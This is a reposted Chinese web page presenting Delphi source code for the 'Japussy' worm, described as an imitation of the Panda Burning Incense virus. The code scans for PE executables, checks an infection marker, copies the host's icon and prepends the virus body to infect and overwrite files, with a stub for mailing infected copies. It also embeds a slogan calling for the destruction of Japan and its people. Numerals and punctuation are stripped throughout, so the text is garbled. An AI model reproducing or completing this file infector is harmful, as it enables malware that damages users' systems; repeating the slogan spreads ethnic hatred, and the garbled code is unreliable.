知识大全 Delphi版模仿熊猫烧香病毒核心源码

Posted 2022-07-14 文件

篇首语：今日长缨在手，何时缚住苍龙。本文由小常识网(cha138.com)小编为大家整理，主要介绍了知识大全 Delphi版模仿熊猫烧香病毒核心源码相关的知识，希望对你有一定的参考价值。

Delphi版模仿熊猫烧香病毒核心源码 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容，让我们赶快一起来看一下吧！

Word WRAP: break word bgColor=#f f f >以下是引用片段

　　program Japussy;uses Windows SysUtils Classes Graphics ShellAPI ReGIStry;const HeaderSize = ; //病毒体的大小 IconOffset = $ EB ; //PE文件主图标的偏移量 //在我的Delphi SP 上面编译得到的大小其它版本的Delphi可能不同 //查找的十六进制字符串可以找到主图标的偏移量 HeaderSize = ; //Upx压缩过病毒体的大小 IconOffset = $ BC; //Upx压缩过PE文件主图标的偏移量 //Upx W 用法: upx Japussy exe IconSize = $ E ; //PE文件主图标的大小字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $ ; //感染标记 //垃圾码以备写入 Catchword = If a race need to be killed out it must be Yamato + If a country need to be destroyed it must be Japan! + *** W Japussy Worm A *** ;$R * RESfunction RegisterServiceProcess(dwProcessID dwType: Integer): Integer; stdcall; external Kernel dll ; //函数声明var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记判断是否为Win x function IsWin x: Boolean;var Ver: TOSVersionInfo;begin Result := False; Ver dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver dwPlatformID = VER_PLATFORM_WIN _WINDOWS) then //Win x Result := True;end; 在流之间复制 procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);var sCurPos dCurPos: Integer;begin sCurPos := Src Position; dCurPos := Dst Position; Src Seek(sStartPos ); Dst Seek(dStartPos ); Dst CopyFrom(Src Count); Src Seek(sCurPos ); Dst Seek(dCurPos );end; 将宿主文件从已感染的PE文件中分离出来以备使用 procedure ExtractFile(FileName: string);var sStream dStream: TFileStream;begin try sStream := TFileStream Create(ParamStr( ) fmOpenRead or fmShareDenyNone); try dStream := TFileStream Create(FileName fmCreate); try sStream Seek(HeaderSize ); //跳过头部的病毒部分 dStream CopyFrom(sStream sStream Size HeaderSize); finally dStream Free; end; finally sStream Free; end; except end;end; 填充STARTUPINFO结构 procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);begin Si cb := SizeOf(Si); Si lpReserved := nil; Si lpDesktop := nil; Si lpTitle := nil; Si dwFlags := STARTF_USESHOWWINDOW; Si wShowWindow := State; Si cbReserved := ; Si lpReserved := nil;end; 发带毒邮件 procedure SendMail;begin //哪位仁兄愿意完成之？end; 感染PE文件 procedure InfectOneFile(FileName: string);var HdrStream SrcStream: TFileStream; IcoStream DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected IsPE: Boolean; i: Integer; Buf: array[ ] of Char;begin try //出错则文件正在被使用退出 if CompareText(FileName JAPUSSY EXE ) = then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream Create(FileName fmOpenRead); try for i := to $ do //检查PE文件头 begin SrcStream Seek(i soFromBeginning); SrcStream Read(Buf ); if (Buf[ ] = # ) and (Buf[ ] = # ) then //PE标记 begin IsPE := True; //是PE文件 Break; end; end;// 本文转自 C++Builder 研究 ;d= ladj SrcStream Seek( soFromEnd); //检查感染标记 SrcStream Read(iID ); if (iID = ID) or (SrcStream Size < ) then //太小的文件不感染 Infected := True; finally SrcStream Free; end; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 Exit; IcoStream := TMemoryStream Create; DstStream := TMemoryStream Create; try aIcon := TIcon Create; try //得到被感染文件的主图标( 字节) 存入流 aIcon ReleaseHandle; aIcon Handle := ExtractIcon(HInstance PChar(FileName) ); aIcon SaveToStream(IcoStream); finally aIcon Free; end; SrcStream := TFileStream Create(FileName fmOpenRead); //头文件 HdrStream := TFileStream Create(ParamStr( ) fmOpenRead or fmShareDenyNone); try //写入病毒体主图标之前的数据 CopyStream(HdrStream DstStream IconOffset); //写入目前程序的主图标 CopyStream(IcoStream DstStream IconOffset IconSize); //写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail); //写入宿主程序 CopyStream(SrcStream DstStream HeaderSize SrcStream Size); //写入已感染的标记 DstStream Seek( ); iID := $ ; DstStream Write(iID ); finally HdrStream Free; end; finally SrcStream Free; IcoStream Free; DstStream SaveToFile(FileName); //替换宿主文件 DstStream Free; end; except; end;end;

cha138/Article/program/Delphi/201311/11123